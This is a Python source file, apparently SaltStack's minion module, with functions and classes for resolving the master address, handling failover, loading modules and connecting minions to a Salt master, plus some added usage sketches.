log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
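# Illustrative sketch, not part of upstream Salt: how the six steps above map
# onto the entry points defined in this module. The config path is hypothetical
# and running this requires a reachable salt-master; tune_in() then blocks and
# serves the event loop.
def _example_minion_startup():
    import salt.config
    opts = salt.config.minion_config('/etc/salt/minion')  # 1. read in the configuration
    minion = Minion(opts)              # minion object; modules/pillar load after connect (2.)
    minion.sync_connect_master()       # 3.-5. authenticate, store the AES key, connect
    minion.tune_in(start=False)        # 6. handle publications on the event loop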
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
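# Illustrative sketch of resolve_dns behaviour (addresses hypothetical): with a
# resolvable master name and default settings it returns both pieces needed to
# build the transport URI, e.g.
#
#   resolve_dns({'master': 'salt.example.com', 'master_port': 4506,
#                'ipv6': False, 'retry_dns': 30, 'file_client': 'remote'})
#   # -> {'master_ip': '192.0.2.10', 'master_uri': 'tcp://192.0.2.10:4506'}
#
# while file_client: local without use_master_when_local short-circuits to
# 127.0.0.1.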
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
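# Minimal behaviour sketch for prep_ip_port, not part of upstream Salt; the
# opts values are made up, and any master_uri_format other than 'ip_only'
# triggers the host:port split.
def _example_prep_ip_port():
    assert prep_ip_port({'master_uri_format': 'default',
                         'master': '127.0.0.1:1234'}) == {'master': '127.0.0.1',
                                                          'master_port': '1234'}
    assert prep_ip_port({'master_uri_format': 'ip_only',
                         'master': 'mysaltmaster'}) == {'master': 'mysaltmaster'}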
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
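# Minimal usage sketch for get_proc_dir, not part of upstream Salt; it uses a
# temporary directory to avoid touching the real cache dir, and omitting
# uid/gid (which default to -1) leaves ownership untouched.
def _example_get_proc_dir():
    import tempfile
    cachedir = tempfile.mkdtemp()
    proc_dir = get_proc_dir(cachedir, mode=0o700)
    # proc_dir is os.path.join(cachedir, 'proc'), created with mode 0700
    return proc_dir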
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
                # Don't append the version that was just derived from parse_input
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
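# Illustrative sketch of the arg/kwarg split performed above, not part of
# upstream Salt. It needs an already loaded minion; 'test.arg' simply echoes
# what it receives and the jid value is made up.
def _example_load_args_and_kwargs(minion_instance):
    func = minion_instance.functions['test.arg']
    args, kwargs = load_args_and_kwargs(
        func,
        ['positional', {'__kwarg__': True, 'keyword': 'value'}],
        data={'jid': '20170101000000000000'})
    # args   -> ['positional']
    # kwargs -> {'keyword': 'value', '__pub_jid': '20170101000000000000'}
    return args, kwargs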
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
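# Hedged sketch of what eval_master_func expects when the minion config sets
# master_type: func (module name and hostname below are hypothetical).
# opts['master'] names a '<module>.<function>' loadable via salt.loader.raw_mod
# and the function must return the master address as a string:
#
#   # contents of the hypothetical module providing get_master():
#   #   def get_master():
#   #       return 'salt-master.example.com'
#
#   # with opts['master'] = 'mymod.get_master', eval_master_func(opts) replaces
#   # opts['master'] with 'salt-master.example.com' and marks it evaluated.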
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
        returned. If this function is called outside the minion's initialization
        phase (for example from the minion's main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
                # we're probably called from the minion's main event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, minions have to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
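# Illustrative minion config fragments covered by eval_master above (hostnames
# hypothetical). Standard, failover and func modes differ only in how 'master'
# is expressed:
#
#   master: salt.example.com            # standard single master
#
#   master_type: failover               # loop through a list of masters
#   master:
#     - master1.example.com
#     - master2.example.com
#   retry_dns: 0                        # forced to 0 for failover (see above)
#
#   master_type: func                   # resolve the master via a module
#   master: mymod.get_master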
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
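# Hedged usage sketch for SMinion, not part of upstream Salt; the config path
# is hypothetical and a usable minion config (plus a reachable master when
# file_client is remote) is required.
def _example_sminion_usage(config_path='/etc/salt/minion'):
    import salt.config
    opts = salt.config.minion_config(config_path)
    sminion = SMinion(opts)
    return sminion.functions['test.ping']()   # -> True once modules are loaded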
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
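# Hedged sketch: MasterMinion is typically built on the master side when
# execution modules are needed without compiling pillar (the opts source below
# is an assumption):
#
#   mminion = MasterMinion(master_opts)   # e.g. opts from salt.config.master_config
#   mminion.functions['test.ping']()      # loaded execution modules, empty pillar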
class MinionManager(MinionBase):
'''
    Create a multi-minion interface: this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = Minion(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
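# Hedged sketch of how MinionManager is typically driven (roughly what the
# salt-minion daemon does; treat the exact call sites as an assumption):
#
#   manager = MinionManager(opts)
#   manager.tune_in()   # spawns one Minion per configured master and blocks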
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=['__master_alive'])
            # add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
                    'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
                    'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
